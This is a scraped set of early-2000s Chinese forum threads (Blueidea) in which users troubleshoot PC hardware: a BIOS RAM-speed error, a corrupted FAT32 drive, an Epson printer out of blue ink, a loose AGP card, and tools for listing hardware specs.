QUESTER 鼠标说话 是个版主 积分：2790 发帖：1293 来自：GTA 注册：2000-08-28 | 发表于 2001-12-29 17:22:34 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP 可能和磁盘缓冲区设置有关，缓冲太大，没有及时清除，就老是标识为第一次使用的状态。 如果使用了Smartdrv，取消对软驱的缓冲可能解决此问题。 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...大象无形 大音稀声... Blueidea Web Team Moderator of Art & Design
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-29 19:36:52 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 不错，很有道理，谢谢QUESTER ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
上一贴 | 下一贴
快速回复 主题：软区疯了？？！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


这个提示啥意思 - 经 典 论 坛

计算机技术
这个提示啥意思

上一贴 | 下一贴
发表人 | 主题: 这个提示啥意思
珊瑚1 初级用户 积分：48 发帖：21 来自：福建 注册：2001-11-03 | 发表于 2001-12-29 12:09:04 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 收藏该主题供以后查看 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP 我的机子开机自检时不能顺利通过，出错提示为： S erial Pressence Detection (SPD) indicates 66MHZ RAM memory. This Processor requires 100MHZ RAM Memory only. Turn your computer off, and upgrade your memory. 不明白什么意思，望大侠们帮偶看看，唉！急得不行。 年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
razor 初级用户 积分：30 发帖：15 来自：杭州 注册：2001-12-07 | 发表于 2001-12-29 12:28:09 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP 是不是你的内存是pc-66的啊, 可以试一下换条pc-100的, 如果你以前是正常的话,去cmos里改一下吧,换成66. 我是Razor
珊瑚1 初级用户 积分：48 发帖：21 来自：福建 注册：2001-11-03 | 发表于 2001-12-29 12:47:19 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP 能给偶讲讲具体在哪项里改吗？先谢了！ 年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
珊瑚1 初级用户 积分：48 发帖：21 来自：福建 注册：2001-11-03 | 发表于 2001-12-31 21:16:11 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP 没人知道吗？ 年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
alphalee 初级用户 积分：62 发帖：22 来自：北京 注册：2001-12-19 | 发表于 2001-12-31 21:43:43 按此观看alphalee的个人资料 按此发邮件给alphalee 访问alphalee的主页 alphalee 的 oicq 是18776996,查看 18776996 的资料 发送悄悄话给alphalee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看alphalee的IP CMOS中有个芯片组的设置。可以调整RAM频率。 我的《日记本子》 http://www.diary365.net/book/choose.asp?author=liyue 青春是个普通的名称，它是幸福美好的，但它也充满着艰苦的磨炼！
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-31 22:56:59 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 在CMOS里面有个内存的时钟设置. 把CL2变成CL3 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 主题：这个提示啥意思
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


救救我的硬盘！我要崩溃了！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
救救我的硬盘！我要崩溃了！

上一贴 | 下一贴
发表人 主题: 救救我的硬盘！我要崩溃了！
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 18:56:14 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 收藏该主题供以后查看 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我的硬盘，全部是fat32分区。
c，装有win2k操作系统。
d，装了个winme（从没用过）

今天为了在98下面重新编译一段代码，于是打算给机器装个win98，谁知道装win98之前的系统磁盘检查中，发现我的c有错误，于是我选择了fix，之后，98的安装copy完成后充启机器就无法继续进行安装！

回dos，dir c：，发现c的目录全部是乱码。
不敢乱动，借来一块硬盘。
在别人的系统上访问我的硬盘，发现我的原c盘中全部是乱码文件和文件夹，我重要的my document文件夹不见了！！！！！

准备用ghost给我混乱的c盘做个备份，可是操作失败！提示忘记了。

怎么办？我估计是98的检查中错误的修改了我的硬盘目录系统，请问各位有何恢复良方？！

态度决定一切

Blueidea Web Team
Team Member

张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 18:59:30 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
各位兄台帮我看看，我的c盘里面可有我写了半个月的代码，我没备份的！！！

态度决定一切

Blueidea Web Team
Team Member

Danger

|危险|男|
积分：4766
发帖：4642
来自：}Earth{
注册：2001-06-15
 发表于 2002-01-02 19:08:21 按此观看Danger的个人资料 按此发邮件给Danger 访问Danger的主页 Danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给Danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Danger的IP
先杀毒，在磁盘扫描一遍~

其他的人 up~!!!!

Go To Detail Page for PHP server model.
http://www.blueidea.com/user/danger/Go_To_Detail_Page.mxp

Blueidea Web Team
Moderator Of Flash forum

张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 19:15:20 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
刚去升级了瑞星，未发现病毒！

态度决定一切

Blueidea Web Team
Team Member

caience

冬天是红色
积分：2676
发帖：2551
来自：小城淄博
注册：2000-10-20
 发表于 2002-01-02 19:16:12 按此观看caience的个人资料 按此发邮件给caience 访问caience的主页 发送悄悄话给caience 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看caience的IP
完了~我也没看到过解决方法~
http://www.kissting.com/forum/showtopic.asp?TOPIC_ID=10755&Forum_ID=22
差不多的~不过也没解决方法~

GUOGUO & MUMU
=NICEMOOD= CS team awper
ximoo

我就是醒目
积分：1947
发帖：2707
来自：火星
注册：2001-09-05
 发表于 2002-01-02 19:24:53 按此观看ximoo的个人资料 按此发邮件给ximoo 访问ximoo的主页 ximoo 的 oicq 是496549,查看 496549 的资料 发送悄悄话给ximoo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ximoo的IP
我的98也挂了 进都进不了 启动就蓝屏 （忘记提示了） 最近都不能玩cs了

2000下速度很慢 跳帧现象比98明显多了

-|ximoo.com|-

空白.......................
DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2002-01-02 19:29:14 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
试试把硬盘插到别的机器上，再用一些扫描和修复硬盘的软件修复一下，看看行不行。

以前那台机器就试过，插到这台里，用scandisk和defrag修复好了，不过那台不严重

修身，养性，治国，平天下
色眯眯的小疯狗

| AHO |
积分：5266
发帖：1401
来自：上海
注册：2001-09-23
 发表于 2002-01-02 19:46:06 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
用debug把fat表调出来看看

最好的情况是98 fix时少删或是多删了字节，造成fat表数据有错位

再看看fat2的数据是不是还好着

| 收藏贴 |
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 20:03:48 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
色眯眯的小疯狗在上个帖子中说
引用:
用debug把fat表调出来看看

最好的情况是98 fix时少删或是多删了字节，造成fat表数据有错位

再看看fat2的数据是不是还好着

debug怎么调fat表？
就算我调出来了，我如何判断他是那里多删了或者少删了？
又怎么看fat2呢？

态度决定一切

Blueidea Web Team
Team Member

色眯眯的小疯狗

| AHO |
积分：5266
发帖：1401
来自：上海
注册：2001-09-23
 发表于 2002-01-02 20:24:40 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
试试这个先~~

http://www.eschool.com.cn/document/20010430/2001043010042901.shtml

| 收藏贴 |
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 20:35:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
谢谢各位先！

态度决定一切

Blueidea Web Team
Team Member

MiSuns

终级用户
积分：1343
发帖：1563
来自：上海
注册：2001-07-08
 发表于 2002-01-02 21:24:13 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
有没有试过启动盘？ 在dos下重装98

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
Danger

|危险|男|
积分：4766
发帖：4642
来自：}Earth{
注册：2001-06-15
 发表于 2002-01-02 21:29:19 按此观看Danger的个人资料 按此发邮件给Danger 访问Danger的主页 Danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给Danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Danger的IP
还有安全模式~!

Go To Detail Page for PHP server model.
http://www.blueidea.com/user/danger/Go_To_Detail_Page.mxp

Blueidea Web Team
Moderator Of Flash forum

上一贴 | 下一贴
快速回复 主题：救救我的硬盘！我要崩溃了！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


蓝色的朋友，我的EPSON打印机打不出蓝色啦！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
蓝色的朋友，我的EPSON打印机打不出蓝色啦！！

上一贴 | 下一贴
发表人 主题: 蓝色的朋友，我的EPSON打印机打不出蓝色啦！！
飞速键盘

初级用户
积分：0
发帖：252
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-07 17:03:15 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 收藏该主题供以后查看 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
昨天刚买一新彩墨盒，打印了一些图片。（耗蓝色的确是耗得比较多，但应该还是有蓝色墨吧，因为我甩了一下墨盒还能甩出蓝色来）
今天打印就出不了蓝色了。
进行喷嘴检查，本应该是黑色、蓝色、红色、黄色、浅蓝色、浅红色
可两块蓝色区完全空白。
清洗了一次打印头仍无效。

我该怎么办？？？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-07 17:56:09 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
修

或

买

等我想想再签
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-07 17:58:25 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
喷嘴检查 清洗打印头多几次~ 不然只有像楼上说的那样了~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

秋天的小乐

终级用户
积分：806
发帖：456
来自：京西
注册：2000-11-13
 发表于 2002-01-08 10:48:35 按此观看秋天的小乐的个人资料 按此发邮件给秋天的小乐 访问秋天的小乐的主页 秋天的小乐 的 oicq 是7545653,查看 7545653 的资料 发送悄悄话给秋天的小乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋天的小乐的IP
能甩也来不一定就能流畅的流出来。可能你的蓝墨里有什么东西堵住了出墨口，可能是包着喷墨嘴的塑料纸。如果你墨盒与喷嘴是连在一体的那也有可能是喷嘴有毛病了。我认为最有可能是没有墨了。甩出来的可能是粘在盒边的一点墨滴。

老婆被泡，马子被翘，脏款被盗，让汽车撞出人行道。
OICQ-7545653
飞速键盘

初级用户
积分：0
发帖：252
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-08 19:04:37 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
今天数了一下打印的图片的数量，发现共打了十九张A4的图片，而且基本上是以蓝色居多。所以可能没有墨的可能性比较大。

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
飞速键盘

初级用户
积分：0
发帖：252
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-08 19:05:48 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
还有一问，买此墨之前，主管还买了两个墨盒，也是爱普生的，包装不同。
打印出来颜色不正，偏红。检查喷嘴，只有红与黑。
后来就换了这个，所以才打得出十九张颜色正常的图片。
现在这个打不出蓝墨了，但还有黑红黄三种色
于是换了个那种不正常的包装的新墨盒，却又只红与黑。
是不是次品？有没有碰到过这种情况？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-01-08 19:14:56 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
http://news.cn.tom.com/Archive/2001/11/22-31186.html

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

飞速键盘

初级用户
积分：0
发帖：252
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-09 13:31:30 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
蓝色在上个帖子中说
引用:
http://news.cn.tom.com/Archive/2001/11/22-31186.html

哇，坑害消费者。这一个月我们公司就换了四个彩色墨盒和一个黑色墨盒了。

那怎么会出现新墨盒缺色的情况呢？也是质量问题吗？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
MCS2000

终级用户
积分：913
发帖：302
来自：HEBEI
注册：2001-03-09
 发表于 2002-01-10 09:53:14 按此观看MCS2000的个人资料 按此发邮件给MCS2000 访问MCS2000的主页 发送悄悄话给MCS2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MCS2000的IP
估计你是没墨了。如果是喷头堵了可以用纯净水冲洗，最好有专业人员指导。

爱普生的墨盒是很害人的。

~~~主页全新改版~~~

---+++--http://mcs2000.yeah.net---+++--

上一贴 | 下一贴
快速回复 主题：蓝色的朋友，我的EPSON打印机打不出蓝色啦！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


显卡总是插不好~~好象接触不良？？ - 经 典 论 坛

计算机技术
显卡总是插不好~~好象接触不良？？

上一贴 | 下一贴
发表人 | 主题: 显卡总是插不好~~好象接触不良？？
元宝 持牌晃晃 积分：420 发帖：427 来自：湖北武汉 注册：2001-05-13 | 发表于 2002-01-15 03:24:21 按此观看元宝的个人资料 按此发邮件给元宝 访问元宝的主页 元宝 的 oicq 是35835874,查看 35835874 的资料 收藏该主题供以后查看 发送悄悄话给元宝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看元宝的IP 显示器上没信号！ 有什么好实用地方法插？ 我已经在不同地机器上碰到数次这样地问题了！ 时好时坏！总是要反复插多编才能好 就像碰运气！ 最坏是只有将整个主板重新完全组装才ＯＫ！ .........http://54zhengdan.vip.sina.com......... 反恐ID-]Blueidea[- C.@@@@@@ 凸-__-凸
蓝色 管理员|蓝色 积分：13927 发帖：6011 来自：China 注册：2000-06-16 | 发表于 2002-01-15 06:16:52 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP AGP显卡是不好装，而且又常在CPU与内存的边上，热量都很大，很容易出问题。 建议清除一下灰尘。大部分可能是主板的问题。 显存也很重要。最后，显示器没信号，也可能与你的显示器有关。不一定是插的方法了。 重装机，我估计是你的显示器有问题吧 找原因得从显示器找起，还有显示器到显卡的头，显卡与主板 我错了，以前我是死不承认，现在需要常常认错。 认错后，再听那掠过林梢的歌唱。 Blueidea Web Team Team Leader
redsteps 红烧脚丫 现任版主 积分：2918 发帖：792 来自：济南 注册：2001-03-14 | 发表于 2002-01-15 09:32:39 按此观看redsteps的个人资料 按此发邮件给redsteps redsteps 的 oicq 是552179,查看 552179 的资料 发送悄悄话给redsteps 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redsteps的IP 是不是那种廉价主板加廉价机箱？ 虽然也符合标准，但是就是不太合适，老是感觉挺软的 你可以去电脑市场，找那种塑料钉，垫在主板和机箱中间 我在那里打工时用这个方法解决过好几个这个问题 （不值钱的，因为只要装机箱就有剩的，当然不一定合适） Blueidea Web Team Moderator Of Flash Forum
MCS2000 终级用户 积分：913 发帖：302 来自：HEBEI 注册：2001-03-09 | 发表于 2002-01-15 13:33:46 按此观看MCS2000的个人资料 按此发邮件给MCS2000 访问MCS2000的主页 发送悄悄话给MCS2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MCS2000的IP 我有一台旧机器，经常会出现显示器上没信号，用电吹风吹吹插槽后，重新再插，很多时候能解决问题。 也可以擦擦你显卡的“金手指”试一试。 ~~~主页全新改版~~~ ---+++--http://mcs2000.yeah.net---+++--
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-01-15 14:42:46 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 很多板卡的接口做工不是很好~通常是卡口和金手指接觸問題~ 插入時各個位置試試~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
元宝 持牌晃晃 积分：420 发帖：427 来自：湖北武汉 注册：2001-05-13 | 发表于 2002-01-15 16:52:44 按此观看元宝的个人资料 按此发邮件给元宝 访问元宝的主页 元宝 的 oicq 是35835874,查看 35835874 的资料 发送悄悄话给元宝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看元宝的IP NND,最讨厌装鸡了！ .........http://54zhengdan.vip.sina.com......... 反恐ID-]Blueidea[- C.@@@@@@ 凸-__-凸
上一贴 | 下一贴
快速回复 主题：显卡总是插不好~~好象接触不良？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


有什么软件可以查出自己电脑的硬件规格? - 经 典 论 坛

计算机技术
有什么软件可以查出自己电脑的硬件规格?

上一贴 | 下一贴
发表人 | 主题: 有什么软件可以查出自己电脑的硬件规格?
冷语 Fierce 现任版主 积分：14069 发帖：5375 来自：BeiJing 注册：2001-03-06 | 发表于 2002-02-06 12:38:57 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 收藏该主题供以后查看 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP 有这类的软件么 [这消息被冷语编辑过(编辑时间2002-02-06 12:40:27)] [ Come As You Are ] Blueidea Web Team Moderator Of Flash forum
QUESTER 鼠标说话 是个版主 积分：2790 发帖：1293 来自：GTA 注册：2000-08-28 | 发表于 2002-02-06 12:56:47 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP yes! you can try "hardware info". it's good. 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...大象无形 大音稀声... Blueidea Web Team Moderator of Art & Design
kirsten9 终级用户 积分：532 发帖：174 来自：冷冷的山脊 注册：2001-07-13 | 发表于 2002-02-06 13:46:28 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP HWiNFO32 { KUka ALl wAYs wITh yOU }
西南变选 超级用户 积分：418 发帖：687 来自：CQ.CN 注册：2002-02-05 | 发表于 2002-02-06 14:23:57 按此观看西南变选的个人资料 按此发邮件给西南变选 西南变选 的 oicq 是13624892,查看 13624892 的资料 发送悄悄话给西南变选 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西南变选的IP 自身的系统信息就比较详细 拜个师,学个艺,天生聪慧，刻苦好学，任劳任怨，任打任骂,不知道那位高人有收徒意向,请速速联系我!
northmice 高级用户 积分：157 发帖：61 来自：北京 注册：2002-01-28 | 发表于 2002-02-06 15:03:30 按此观看northmice的个人资料 按此发邮件给northmice 访问northmice的主页 northmice 的 oicq 是84661646,查看 84661646 的资料 发送悄悄话给northmice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northmice的IP 好像控制面版里的系统就可以 QQ 84661646 我的主页 家园----环境保护 http://northmice1.k12.com.cn
mao 现任版主 积分：1694 发帖：691 来自：北京 注册：2000-07-23 | 发表于 2002-02-06 15:33:05 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP 不用什么软件一般的都可以看到。 显卡，cpu,内存，硬盘，主板，在开始的检测中都可以看到大概的信息 声卡可以看到具体的声卡芯片，当然如果要看一些集体的指数还是要找一些软件测得，比如sissoft。 解决问题才有进步 解决问题才有进步
xqlyg 超级用户 积分：362 发帖：92 来自：china 注册：2002-02-07 | 发表于 2002-02-07 19:38:48 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP SiSoft Sandra 2001te Standard
肖天 超级用户 积分：354 发帖：92 来自：黑龙江省 注册：2001-06-28 | 发表于 2002-02-08 07:48:15 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP 我用的是WINDOWS优化大师 good good study ,day day up!
上一贴 | 下一贴
快速回复 主题：有什么软件可以查出自己电脑的硬件规格?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


FDISK的未公开参数详解 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
FDISK的未公开参数详解

上一贴 | 下一贴
发表人 主题: FDISK的未公开参数详解
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
